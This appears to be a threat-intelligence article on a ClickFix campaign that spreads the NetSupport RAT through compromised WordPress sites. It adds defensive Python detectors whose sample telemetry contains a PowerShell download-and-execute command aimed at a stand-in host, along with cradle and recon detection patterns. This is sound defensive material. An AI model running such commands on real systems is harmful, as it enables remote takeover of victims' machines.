Cybercriminals Exploit Compromised WordPress Sites to Deploy NetSupport RAT via ClickFix Technique

In a recent wave of attacks, threat actors have been using compromised WordPress websites to distribute the NetSupport Remote Access Trojan (RAT) through the social engineering technique known as ClickFix, in which the victim is talked into running the attacker's command by hand. The campaign, identified by the Cybereason Global Security Operations Center (GSOC) in May 2025, is another instance of attackers repurposing a legitimate administration tool for malicious ends.

Understanding NetSupport RAT

NetSupport Manager is a legitimate remote administration product used by IT support teams. Attackers deploy its client component on victim machines without the owner's knowledge and point it at servers they control, which turns the same software into a Remote Access Trojan (RAT): screen viewing, file transfer, a remote command prompt and arbitrary command execution all come built in, and the binaries are signed and well known, so they rarely trip file-based detection. The misuse of NetSupport Manager in this way has been documented in several earlier campaigns, including ones built on fake browser updates and compromised websites. ([blogs.vmware.com](https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html))

The ClickFix Attack Chain

The ClickFix technique is a multi-stage chain that combines website compromise with social engineering. Because the victim, not the browser, launches the payload, no exploit is needed and the usual download and attachment controls never see a file. The attack unfolds as follows:

1. Initial Lure: Users are drawn in through phishing emails, malicious PDF attachments, or links on gaming websites that redirect them to the compromised WordPress sites.

2. Malicious Script Execution: When one of the infected pages loads, JavaScript hidden in the site's meta description fetches and executes a remote script named j.js from an attacker-controlled domain.

3. System Profiling: The script identifies the visitor's operating system and browser, and uses a local storage flag to record that the visitor has already seen the lure. Showing the prompt only once per browser limits how often analysts and scanners encounter it.

4. Fake CAPTCHA Prompt: Victims are shown a counterfeit CAPTCHA verification page, built with modern front-end frameworks so that it looks legitimate. The page has already placed the "verification code" on the clipboard and instructs the user to press Windows + R and paste it into the Run dialog box.

5. Execution of Malicious Command: The pasted "verification code" is a PowerShell command. When the user runs it, it downloads and installs the NetSupport client, giving the attackers remote access to the system under the victim's own account.
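One check a site owner can run against steps 2 and 3 is to parse each page the site serves and flag script tags that load code from domains outside an allowlist, plus inline scripts carrying the markers a ClickFix loader needs (local-storage visit tracking, clipboard writes, Run-dialog strings). The following is an added example, not code from the article or from Cybereason's report; the sample page, the site name acmeplumbing.example and the host cdn-static.example.invalid are constructed for it.

```python
"""Added example: audit a fetched WordPress page for injected loader scripts.
Not from the original article. Sample HTML and hostnames are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings a ClickFix lure page typically needs in its inline JavaScript.
CLICKFIX_MARKERS = (
    "localStorage",         # one-time display flag (step 3 above)
    "navigator.clipboard",  # silently copies the command the user will paste
    "clipboard.writeText",
    "Windows + R",
    "powershell",
)


class ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_page(html, site_host, allowed_hosts=()):
    """Return (kind, detail) findings: scripts from hosts that are neither the
    site itself nor allowlisted, and inline scripts containing lure markers."""
    parser = ScriptCollector()
    parser.feed(html)
    trusted = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for relative paths such as /wp-includes/...
        if host and host.lower() not in trusted:
            findings.append(("external-script", src))
    for body in parser.inline:
        for marker in CLICKFIX_MARKERS:
            if marker in body:
                findings.append(("inline-marker", marker))
    return findings


# Constructed page: a legitimate relative jQuery include, an injected remote
# loader, and an inline snippet with the one-time flag and clipboard write.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<meta name="description" content="Acme Plumbing, 24/7 emergency service">
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn-static.example.invalid/j.js"></script>
<script>
  if (!localStorage.getItem("v")) {
    localStorage.setItem("v", "1");
    document.getElementById("cap").onclick = function () {
      navigator.clipboard.writeText(cmd);
    };
  }
</script>
</head><body><div id="cap">Verify you are human</div></body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_PAGE, "acmeplumbing.example"):
        print(kind, detail)
```

Run it against pages fetched with a plain HTTP client rather than a browser so that the loader, which only reveals itself to first-time visitors, cannot hide behind the local storage check. Treat any external script host that is not part of your deployment as a finding to investigate, and keep the allowlist short.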

Post-Infection Activities

Once installed, the NetSupport client connects out to attacker-controlled command-and-control servers, in this campaign including servers located in Moldova. The malware creates registry entries so that the client restarts after a reboot, giving the attackers long-term access to the compromised system.

Within hours of a successful compromise, the threat actors have been observed carrying out reconnaissance, including querying Active Directory for domain computers and staging files in public directories. They use NetSupport's legitimate remote command prompt feature to run commands such as net group "Domain Computers" /domain to map the network, which means the enumeration shows up as a cmd.exe or net.exe process whose parent is the NetSupport client rather than an interactive user session.

Broader Implications and Recommendations

The misuse of legitimate tools like NetSupport Manager reflects a broader trend of attackers blending their activity into normal IT operations, where a signed remote administration client and a handful of net commands look much like what a help desk would do. Security teams recommend the following measures to mitigate such threats:

– Immediate Isolation: Isolate affected systems from the network to cut the operator's remote session and prevent lateral movement.

– Credential Resets: Reset passwords for any account used on a compromised host, since the operator had interactive access and could have harvested credentials from it.

– Blocking Malicious Domains: Block the domains and IP addresses identified as hosting the loader script, the PowerShell payload, and the command-and-control servers.

– Monitoring PowerShell Activity: Alert on PowerShell launched from the Run dialog (parent process explorer.exe) with a download-and-execute command line, and on shells spawned by the NetSupport client. The Run dialog's history in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) is a quick forensic check for whether a user pasted such a command.
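The following is an added example of triage logic for the execution stage of the chain, the post-infection reconnaissance, and the PowerShell-monitoring recommendation above. It is not code from the article or from Cybereason's report. The process records (shaped like Sysmon Event ID 1 or EDR process-creation telemetry), the RunMRU export, the PIDs, the install path and the host dl.example.invalid are all constructed for this example.

```python
"""Added example: ClickFix / NetSupport host triage over constructed telemetry.
Not from the original article; all records and hostnames below are made up."""
import re

# Download-and-execute cradle indicators typical of pasted ClickFix commands.
CRADLE_PATTERNS = [
    r"\biwr\b", r"invoke-webrequest", r"invoke-expression", r"\biex\b",
    r"downloadstring", r"downloadfile", r"-enc(odedcommand)?\b",
    r"-w(indowstyle)?\s+hidden", r"\bmshta\b", r"\bcurl\b",
]
# Domain enumeration seen through NetSupport's remote command prompt.
RECON_PATTERNS = [
    r"net\s+group\b.*/domain", r"domain computers", r"domain admins",
    r"\bnltest\b", r"\bdsquery\b", r"get-adcomputer",
]
NETSUPPORT_CLIENT = "client32.exe"  # NetSupport Manager client binary


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_cradle(ev):
    """Cradle patterns matched when PowerShell starts from the Run dialog
    (parent explorer.exe); an empty list means the event does not qualify."""
    if basename(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return []
    if basename(ev["ParentImage"]) != "explorer.exe":
        return []
    return [p for p in CRADLE_PATTERNS if re.search(p, ev["CommandLine"].lower())]


def under_netsupport(ev, by_pid):
    """True if any ancestor of ev in the captured tree is the NetSupport client."""
    pid, seen = ev["ParentProcessId"], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if basename(by_pid[pid]["Image"]) == NETSUPPORT_CLIENT:
            return True
        pid = by_pid[pid]["ParentProcessId"]
    return False


def netsupport_recon(ev, by_pid):
    hits = [p for p in RECON_PATTERNS if re.search(p, ev["CommandLine"].lower())]
    return hits if hits and under_netsupport(ev, by_pid) else []


def parse_runmru(values):
    """Run-dialog history: MRUList lists entry letters most recent first and
    each entry's data ends in a literal backslash-1 suffix."""
    out = []
    for key in values.get("MRUList", ""):
        data = values.get(key)
        if data is not None:
            out.append(data[:-2] if data.endswith("\\1") else data)
    return out


def triage(events, runmru):
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        hits = clickfix_cradle(e)
        if hits:
            alerts.append({"rule": "clickfix_run_dialog_cradle", "pid": e["ProcessId"], "hits": hits})
        hits = netsupport_recon(e, by_pid)
        if hits:
            alerts.append({"rule": "netsupport_recon", "pid": e["ProcessId"], "hits": hits})
    for entry in parse_runmru(runmru):
        hits = [p for p in CRADLE_PATTERNS if re.search(p, entry.lower())]
        if hits:
            alerts.append({"rule": "runmru_cradle", "entry": entry, "hits": hits})
    return alerts


def ev(pid, ppid, image, parent, cmd):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent, "CommandLine": cmd}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NS = r"C:\ProgramData\NSClient\client32.exe"  # constructed install path
EVENTS = [  # constructed process tree; 3988 is explorer.exe
    ev(4120, 3988, PS, r"C:\Windows\explorer.exe",
       'powershell -w hidden -c "iwr http://dl.example.invalid/c.txt | iex"'),
    ev(5210, 3988, PS, r"C:\Windows\explorer.exe", "powershell"),  # benign console
    ev(6004, 4120, NS, PS, NS),
    ev(6120, 6004, r"C:\Windows\System32\cmd.exe", NS, 'cmd.exe /c net group "Domain Computers" /domain'),
    ev(6130, 6120, r"C:\Windows\System32\net.exe", r"C:\Windows\System32\cmd.exe",
       'net group "Domain Computers" /domain'),
    ev(7000, 3988, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
       'cmd.exe /c net group "Domain Admins" /domain'),  # admin at the console, not flagged
]
RUNMRU = {"MRUList": "cab", "a": "cmd\\1", "b": "notepad\\1",
          "c": 'powershell -w hidden -c "iwr http://dl.example.invalid/c.txt | iex"\\1'}

if __name__ == "__main__":
    for a in triage(EVENTS, RUNMRU):
        print(a)
```

The parent-process condition is what keeps the first rule quiet on ordinary PowerShell use: a user opening a console from the Run dialog produces no cradle hits, and a script launched by a scheduled task or an installer has a different parent. The recon rule deliberately ignores the same net group command typed by an administrator at the console (PID 7000 in the constructed tree) and fires only when the process descends from the NetSupport client.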

By understanding the tactics employed in the ClickFix campaign and implementing robust security measures, organizations can better defend against the evolving landscape of cyber threats.